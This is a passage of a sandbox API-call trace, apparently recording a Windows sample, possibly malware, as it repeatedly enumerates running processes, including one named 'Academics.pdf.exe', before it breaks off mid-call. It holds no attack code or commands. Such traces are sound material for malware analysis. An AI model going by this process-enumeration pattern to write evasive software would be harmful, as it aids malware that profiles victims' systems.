[0284.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0284.166] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0284.167] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0284.168] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0284.169] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0284.170] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0284.171] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0284.172] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0284.172] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0284.173] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0284.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0284.175] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0284.176] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0284.177] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0284.178] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0284.179] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0284.180] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.181] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.182] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.183] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0284.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0284.187] CloseHandle (hObject=0x294) returned 1 [0284.187] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.188] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0284.191] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.192] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.194] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.195] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.196] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.197] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0284.198] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0284.199] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0284.200] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0284.202] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.203] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.204] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.205] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.206] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.206] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0284.207] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.208] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.209] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0284.210] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0284.212] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0284.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0284.213] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.214] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0284.215] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0284.216] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0284.217] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0284.218] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0284.219] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0284.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0284.220] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0284.221] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0284.223] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0284.224] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0284.225] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0284.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0284.226] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0284.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0284.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0284.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0284.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0284.232] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0284.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0284.236] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0284.237] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0284.238] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0284.239] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0284.240] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0284.241] CloseHandle (hObject=0x294) returned 1 [0284.241] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.241] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0284.243] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.244] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0284.245] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0284.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0284.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0284.266] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.266] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.266] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.267] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0284.267] RtlAllocateHeap 